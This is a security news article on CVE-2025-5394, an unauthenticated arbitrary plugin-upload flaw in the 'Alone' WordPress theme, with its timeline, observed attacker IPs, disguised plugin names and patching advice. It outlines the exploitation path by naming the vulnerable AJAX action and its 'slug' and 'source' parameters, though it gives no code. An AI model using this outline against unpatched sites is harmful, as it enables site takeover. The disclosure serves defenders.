WordPress Theme Security Vulnerability Enables to Execute Arbitrary Code Remotely
A critical security vulnerability has been discovered in the popular “Alone” WordPress theme that allows unauthenticated attackers to execute arbitrary code remotely and potentially take complete control of affected websites.
The vulnerability, tracked as CVE-2025-5394, affects the charity and non-profit theme which has been sold over 9,000 times on ThemeForest.
Vulnerability Details and Timeline
The security flaw stems from a missing authorization check in the theme’s plugin installation functionality, specifically within the alone_import_pack_install_plugin() function.
This vulnerability enables unauthenticated attackers to upload malicious ZIP files disguised as plugins from remote locations, leading to remote code execution capabilities.
Wordfence researchers discovered that the vulnerable function lacks both capability checks and nonce verification, making it accessible to any visitor through the ‘wp_ajax_nopriv_alone_import_pack_install_plugin’ AJAX action.
Attackers can exploit this by specifying both a plugin ‘slug’ and a remote ‘source’, allowing them to install malicious plugins from external servers.
The vulnerability affects all versions of the Alone theme up to and including version 7.8.3. The vendor released a patched version 7.8.5 on June 16, 2025, following responsible disclosure protocols.
However, security researchers observed that attackers began exploiting this vulnerability on July 12, 2025, two days before the public disclosure on July 14, 2025.
| Attribute | Details |
| CVE ID | CVE-2025-5394 |
| CVSS Score | 9.8 (Critical) |
| Affected Software | Alone – Charity Multipurpose Non-profit WordPress Theme |
| Affected Versions | <= 7.8.3 |
| Patched Version | 7.8.5 |
| Vulnerability Type | Missing Authorization to Unauthenticated Arbitrary File Upload |
The Wordfence security team reports blocking over 120,900 exploit attempts targeting this vulnerability since the patch was released.
The attacks primarily originate from IP addresses including 193.84.71.244, 87.120.92.24, and 146.19.213.18, with the first IP accounting for nearly 40,000 blocked requests.
Attackers have been observed installing backdoors, file managers, and scripts that create malicious administrator accounts.
The malicious plugins are often disguised with legitimate-sounding names like “wp-classic-editor.zip” or “background-image-cropper.zip”.
Wordfence Premium, Care, and Response users received firewall protection on May 30, 2025, while free users received protection after the standard 30-day delay on June 29, 2025.
Website administrators using the Alone theme are strongly urged to update to version 7.8.5 immediately and review their plugin directories for any suspicious installations.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
